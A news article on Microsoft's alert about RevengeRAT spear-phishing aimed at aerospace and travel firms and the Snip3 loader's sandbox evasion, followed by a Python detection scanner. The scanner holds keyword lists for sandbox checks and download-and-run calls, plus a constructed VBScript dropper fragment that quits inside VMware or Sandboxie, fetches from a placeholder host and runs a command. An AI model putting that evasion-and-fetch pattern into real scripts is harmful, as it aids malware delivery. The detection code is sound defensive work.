This new malware can steal your passwords and hijack your webcam – BGR

Cybersecurity news has been dominated in recent days by the fallout from the Russian ransomware gang you’ve no doubt heard about by now, the one that hacked the IT network of a major US fuel pipeline and sent US national security officials scrambling. We will be reeling from the effects of this attack, one way or another, for a long time to come, and meanwhile a slew of additional new threats and cybersecurity news is keeping security professionals busy on multiple fronts.

Microsoft in recent days sent out an alert about one such threat — a remote access tool called RevengeRAT that appears to be targeting the aerospace and travel industries with spear-phishing emails. This particular threat is delivered via an email designed to fool the recipient into thinking it’s genuine and thus opening it, along with an attached Adobe PDF file that goes on to download a malicious file.

Microsoft goes on to explain that attackers use these kinds of remote access Trojans for everything from data theft to follow-on activity, as well as the delivery of additional attack payloads that are used for data exfiltration. “The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo,” explains Microsoft in a series of tweets about this threat. “An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.”

These kinds of Trojans steal content like user login credentials and webcam images, along with anything that has been copied to the system clipboard. Another point to note: the malicious executable content at the center of this threat campaign is a loader called Snip3. Security firm Morphisec has also pointed out another feature of Snip3: if “the script is executed within Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments” and identifies one of those virtual machine environments, it terminates without loading the Trojan.
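The sandbox check described above is also a detection opportunity: a script that probes for VMware, VirtualBox or Sandboxie and then fetches and runs a payload looks very different from a normal admin script. The following heuristic scanner is an added example written for this article, not code from Microsoft, Morphisec or the Snip3 analysis; the indicator strings (including the Sandboxie DLL name `sbiedll`) and the two constructed VBScript fragments are assumptions chosen to illustrate the idea.

```python
import re

# Indicator classes taken from the article's description of the chain:
# Snip3 aborts inside Microsoft Sandbox / VMware / VirtualBox / Sandboxie,
# and the dropper is a VBScript that downloads and runs the RAT payload.
# "vbox" and "sbiedll" are assumed extra strings, not taken from the article.
SANDBOX_TERMS = ("vmware", "virtualbox", "vbox", "sandboxie", "sbiedll", "sandbox")
DOWNLOAD_PATTERNS = (r"https?://", r"msxml2\.xmlhttp", r"winhttprequest", r"urldownloadtofile")
EXEC_PATTERNS = (r"wscript\.shell", r"\.run\b", r"\bexecute\b", r"powershell")


def classify_script(text):
    """Return the set of indicator classes present in a script body (case-insensitive)."""
    lowered = text.lower()
    found = set()
    if any(term in lowered for term in SANDBOX_TERMS):
        found.add("sandbox_check")
    if any(re.search(p, lowered) for p in DOWNLOAD_PATTERNS):
        found.add("download")
    if any(re.search(p, lowered) for p in EXEC_PATTERNS):
        found.add("execute")
    return found


def is_suspicious(text):
    """Flag only when sandbox evasion co-occurs with download-and-execute behaviour,
    so a lone URL or a lone WScript.Shell call in a legitimate logon script does not alert."""
    return {"sandbox_check", "download", "execute"} <= classify_script(text)


# Constructed fragment mimicking the described dropper (non-functional, placeholder URL).
SAMPLE_DROPPER = """
If InStr(LCase(proc), "vmware") > 0 Or InStr(LCase(proc), "sandboxie") > 0 Then WScript.Quit
Set req = CreateObject("MSXML2.XMLHTTP")
req.Open "GET", "http://stage.invalid/placeholder", False
Set sh = CreateObject("WScript.Shell")
sh.Run cmd
"""

# Constructed benign admin script: file copy only, no evasion, no download.
SAMPLE_BENIGN = """
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "C:\\reports\\daily.csv", "D:\\backup\\daily.csv"
"""

if __name__ == "__main__":
    print("dropper flagged:", is_suspicious(SAMPLE_DROPPER))
    print("benign flagged:", is_suspicious(SAMPLE_BENIGN))
```

Requiring all three classes keeps the false-positive rate manageable on mail-gateway or EDR script telemetry; a single class (for instance a bare URL) should at most add to a score, not alert on its own.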

The method used to get this attack running, by the way, remains incredibly popular among hackers, partly because of how easy it is to trick at least one person within an organization or enterprise into clicking on a file from a dodgy email that has been dressed up to appear genuine. I’ve also read some unconfirmed reports that a sketchy email with a malicious file attached may have been what kicked off the Colonial Pipeline attack in recent days, which allowed the DarkSide ransomware gang to steal some 100GB of files from the pipeline company’s IT network and then lock that network down until a nearly $5 million ransom was paid.
